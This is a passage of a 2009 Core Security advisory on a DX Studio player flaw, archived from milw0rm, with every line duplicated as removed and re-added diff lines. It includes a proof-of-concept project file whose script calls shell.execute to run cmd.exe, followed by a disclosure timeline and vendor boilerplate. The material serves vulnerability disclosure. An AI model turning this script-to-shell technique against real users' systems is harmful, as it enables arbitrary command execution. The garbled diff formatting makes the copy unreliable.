+  <display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no"
-maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes"
+maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes"
-changeresolution="no" userresize="yes" workarea="no" windowmask="no"
+changeresolution="no" userresize="yes" workarea="no" windowmask="no"
-src="" minplayerversion="1.0.0">
+src="" minplayerversion="1.0.0">
-    <loading console="yes" custom="no" custombackground="no"
+    <loading console="yes" custom="no" custombackground="no"
-customlogo="yes" showversion="no">
+customlogo="yes" showversion="no">
-      <prop id="background" type="color" r="0" g="0" b="0" a="1" />
+      <prop id="background" type="color" r="0" g="0" b="0" a="1" />
-      <logo src="" />
+      <logo src="" />
-      <customprogress />
+      <customprogress />
-    </loading>
+    </loading>
-  </display>
+  </display>
-  <script>
+  <script>
-    <![CDATA[function onInit()
+    <![CDATA[function onInit()
-{
+{
-shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
+shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
-} ] ]>
+} ] ]>
-  </script>
+  </script>
-  <licenseinfo stamp="cgdaaaaa" />
+  <licenseinfo stamp="cgdaaaaa" />
-  <security>
+  <security>
-    <prop id="password" type="string" value="" />
+    <prop id="password" type="string" value="" />
-    <prop id="allowplayer" type="bool" state="no" />
+    <prop id="allowplayer" type="bool" state="no" />
-    <prop id="nocache" type="bool" state="yes" />
+    <prop id="nocache" type="bool" state="yes" />
-  </security>
+  </security>
-</dxstudio>
+</dxstudio>
-
+
- -----------/
+- -----------/
-
+
-Note: The security vulnerability is also exploitable on the standalone
+Note: The security vulnerability is also exploitable on the standalone
-player, however, this functionality appears to be the expected behavior
+player, however, this functionality appears to be the expected behavior
-and fully intended for the standalone player.
+and fully intended for the standalone player.
-
+
-
+
-9. *Report Timeline*
+9. *Report Timeline*
-
+
-. 2009-05-21:
+. 2009-05-21:
-Core Security Technologies notifies the Worldweaver Support Team (WST)
+Core Security Technologies notifies the Worldweaver Support Team (WST)
-of the vulnerability and announces its initial plan to publish the
+of the vulnerability and announces its initial plan to publish the
-content on June 15th, 2009.
+content on June 15th, 2009.
-
+
-. 2009-05-26:
+. 2009-05-26:
-The WST asks Core for a technical description of the vulnerability.
+The WST asks Core for a technical description of the vulnerability.
-
+
-. 2009-05-26:
+. 2009-05-26:
-Technical details sent to WST by Core.
+Technical details sent to WST by Core.
-
+
-. 2009-06-08:
+. 2009-06-08:
-Core asks WST for an estimated date to fix this issue.
+Core asks WST for an estimated date to fix this issue.
-
+
-. 2009-06-08:
+. 2009-06-08:
-WST notifies Core that a fix has already been produced and it is
+WST notifies Core that a fix has already been produced and it is
-available to the users.
+available to the users.
-
+
-. 2009-06-09:
+. 2009-06-09:
-The advisory CORE-2009-0521 is published.
+The advisory CORE-2009-0521 is published.
-
+
-
+
-10. *References*
+10. *References*
-
+
-[1] http://www.dxstudio.com.
+[1] http://www.dxstudio.com.
-[2] http://www.dxstudio.com/download2.aspx.
+[2] http://www.dxstudio.com/download2.aspx.
-[3]
+[3]
-http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd
+http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd
-
+
-
+
-11. *About CoreLabs*
+11. *About CoreLabs*
-
+
-CoreLabs, the research center of Core Security Technologies, is charged
+CoreLabs, the research center of Core Security Technologies, is charged
-with anticipating the future needs and requirements for information
+with anticipating the future needs and requirements for information
-security technologies. We conduct our research in several important
+security technologies. We conduct our research in several important
-areas of computer security including system vulnerabilities, cyber
+areas of computer security including system vulnerabilities, cyber
-attack planning and simulation, source code auditing, and cryptography.
+attack planning and simulation, source code auditing, and cryptography.
-Our results include problem formalization, identification of
+Our results include problem formalization, identification of
-vulnerabilities, novel solutions and prototypes for new technologies.
+vulnerabilities, novel solutions and prototypes for new technologies.
-CoreLabs regularly publishes security advisories, technical papers,
+CoreLabs regularly publishes security advisories, technical papers,
-project information and shared software tools for public use at:
+project information and shared software tools for public use at:
-http://www.coresecurity.com/corelabs.
+http://www.coresecurity.com/corelabs.
-
+
-
+
-12. *About Core Security Technologies*
+12. *About Core Security Technologies*
-
+
-Core Security Technologies develops strategic solutions that help
+Core Security Technologies develops strategic solutions that help
-security-conscious organizations worldwide develop and maintain a
+security-conscious organizations worldwide develop and maintain a
-proactive process for securing their networks. The company's flagship
+proactive process for securing their networks. The company's flagship
-product, CORE IMPACT, is the most comprehensive product for performing
+product, CORE IMPACT, is the most comprehensive product for performing
-enterprise security assurance testing. CORE IMPACT evaluates network,
+enterprise security assurance testing. CORE IMPACT evaluates network,
-endpoint and end-user vulnerabilities and identifies what resources are
+endpoint and end-user vulnerabilities and identifies what resources are
-exposed. It enables organizations to determine if current security
+exposed. It enables organizations to determine if current security
-investments are detecting and preventing attacks. Core Security
+investments are detecting and preventing attacks. Core Security
-Technologies augments its leading technology solution with world-class
+Technologies augments its leading technology solution with world-class
-security consulting services, including penetration testing and software
+security consulting services, including penetration testing and software
-security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
+security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
-Security Technologies can be reached at 617-399-6980 or on the Web at
+Security Technologies can be reached at 617-399-6980 or on the Web at
-http://www.coresecurity.com.
+http://www.coresecurity.com.
-
+
-
+
-13. *Disclaimer*
+13. *Disclaimer*
-
+
-The contents of this advisory are copyright (c) 2009 Core Security
+The contents of this advisory are copyright (c) 2009 Core Security
-Technologies and (c) 2009 CoreLabs, and may be distributed freely
+Technologies and (c) 2009 CoreLabs, and may be distributed freely
-provided that no fee is charged for this distribution and proper credit
+provided that no fee is charged for this distribution and proper credit
-is given.
+is given.
-
+
-
+
-14. *PGP/GPG Keys*
+14. *PGP/GPG Keys*
-
+
-This advisory has been signed with the GPG key of Core Security
+This advisory has been signed with the GPG key of Core Security
-Technologies advisories team, which is available for download at
+Technologies advisories team, which is available for download at
-http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
+http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
+-----BEGIN PGP SIGNATURE-----
-Version: GnuPG v1.4.7 (MingW32)
+Version: GnuPG v1.4.7 (MingW32)
-Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
+Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
-
+
-iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q
+iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q
-PMPteYbShbRU4j4tIk93HPM=
+PMPteYbShbRU4j4tIk93HPM=
-=Mx5G
+=Mx5G
-----END PGP SIGNATURE-----
+-----END PGP SIGNATURE-----
-
+
-# milw0rm.com [2009-06-10]
+# milw0rm.com [2009-06-10]